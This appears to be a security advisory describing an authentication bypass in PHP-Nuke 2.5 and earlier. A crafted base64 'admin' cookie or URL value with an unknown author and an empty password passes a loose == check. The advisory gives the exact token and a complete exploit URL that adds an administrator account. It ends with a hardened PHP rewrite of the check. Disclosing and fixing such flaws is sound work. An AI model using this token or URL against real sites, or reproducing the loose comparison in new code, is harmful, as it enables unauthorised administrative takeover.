A vulnerability in the way PHP-Nuke, a news site administrative tool, authenticates administrative accounts allows a remote attacker to gain administrative access to the application. An attacker could edit users, articles, topics, banners, assign authors, etc.
Summary
A security vulnerability in PHP-Nuke, a news site administration package, allows a
remote attacker to gain administrative access to the application. PHP-Nuke is
open source and can be downloaded freely at:
http://linuxpreview.org/php-nuke.php3?op=english
Versions affected: ALL (current PHP-Nuke 2.5 or lower)
Details
Now let's take a look at how PHP-Nuke authenticates administrative accounts.
In the auth.inc.php3 file, starting at line 31:
$admintest = 0;
if(isset($admin)) {
    if(!IsSet($mainfile)) { include("mainfile.php3"); }
    // $admin arrives base64-encoded as "aid:pwd"
    $admin = base64_decode($admin);
    $admin = explode(":", $admin);
    $aid = "$admin[0]";
    $pwd = "$admin[1]";
    dbconnect();
    $result=mysql_query("select pwd from authors where aid='$aid'");
    if(!$result) {
        echo "Selection from database failed!";
        exit;
    } else {
        // no check that a row was actually returned
        list($pass)=mysql_fetch_row($result);
        // loose (==) comparison, not a strict (===) one
        if($pass == $pwd) {
            $admintest = 1;
        }
    }
}
Here some checks are done on the $admin value. Since PHP automatically makes
any variable received from cookies or forms (GET/POST) global to the script,
we can supply our own $admin value in the URL. If $pwd (the second element of
that "scrambled" $admin) does not match the password in the fetched row,
authentication fails ($admintest stays 0); otherwise we are able to access any
function in admin.php3. Sounds normal, until you continue to read the following
exploit.
The Exploit
The theory is simply to make $pass == $pwd. The $pass value returned from
mysql_fetch_row() could be anything, or could be FALSE if there are no more
rows. So why not make $pwd (string type) and $pass (boolean type) both equally
"false"? Yep, that satisfies the condition. The expression "if($pass == $pwd)"
compares only values, NOT types. So setting $pwd = "" (an empty string) will be
EQUAL (though not identical) to the FALSE value of $pass.
The rest is much simpler. Putting any string NOT present in the authors table
into $aid will do for us: mysql_query() still returns a true (non-FALSE)
result, but mysql_fetch_row() returns FALSE because there is no row. So, for
example, crafting our $admin value as:
$aid = "blabla"; $pwd = "";
$admin = base64_encode("$aid:$pwd");
gives us "YmxhYmxhOg==". Using this value, we are now able to access all
functions in admin.php3. The following URL will add an account
"godbless:indonesia" to the authors table:
http://site//admin.php3?admin=YmxhYmxhOg%3D%3D&op=AddAuthor&add_aid=godbless&add_name=Godbless&add_pwd=indonesia&add_url=&add_email=fake@mail.me
Looking at the options, the administrator can edit users, articles, topics,
banners, assign authors, etc.
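As an added example (not PHP-Nuke's own code), the check above is rebuilt in a form that fails closed: the MySQL lookup is replaced by an in-memory author table (an assumption, so the script runs stand-alone), passwords are assumed to be stored as password_hash() digests rather than plaintext, and the advisory's "blabla:" token is fed to both the loose and the hardened check.

```php
<?php
declare(strict_types=1);

// Constructed sample table: aid => password_hash() digest (assumption: hashed storage).
$authors = ['admin' => password_hash('s3cret', PASSWORD_DEFAULT)];

// Same shape as auth.inc.php3: no row check, loose == comparison.
// For an unknown aid the "row" is false, list() leaves $pass null,
// and null == "" is true, so the bypass token is accepted.
function admintest_loose(array $authors, string $admin): bool
{
    $parts = explode(':', base64_decode($admin));
    $aid = $parts[0] ?? '';
    $pwd = $parts[1] ?? '';
    $row = isset($authors[$aid]) ? [$authors[$aid]] : false; // mysql_fetch_row() analogue
    list($pass) = $row;
    return $pass == $pwd;
}

// Hardened: strict base64, exactly "aid:pwd" with both parts non-empty,
// an explicit "no such author" failure, and a hash verification instead
// of comparing a possibly-missing value with ==.
function admintest_strict(array $authors, string $admin): bool
{
    $decoded = base64_decode($admin, true);
    if ($decoded === false) {
        return false;
    }
    $parts = explode(':', $decoded, 2);
    if (count($parts) !== 2 || $parts[0] === '' || $parts[1] === '') {
        return false;
    }
    [$aid, $pwd] = $parts;
    if (!array_key_exists($aid, $authors)) {
        return false; // no row: fail closed instead of comparing null
    }
    return password_verify($pwd, $authors[$aid]);
}

$bypass = base64_encode('blabla:');      // the advisory's token, "YmxhYmxhOg=="
$valid  = base64_encode('admin:s3cret'); // constructed legitimate credential

var_dump(admintest_loose($authors, $bypass));
var_dump(admintest_strict($authors, $bypass));
var_dump(admintest_strict($authors, $valid));
```

The three var_dump() calls show the loose check accepting the unknown-author token while the hardened check rejects it and still accepts the real credential.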
Fabian Clone <fabianclone@usa.net>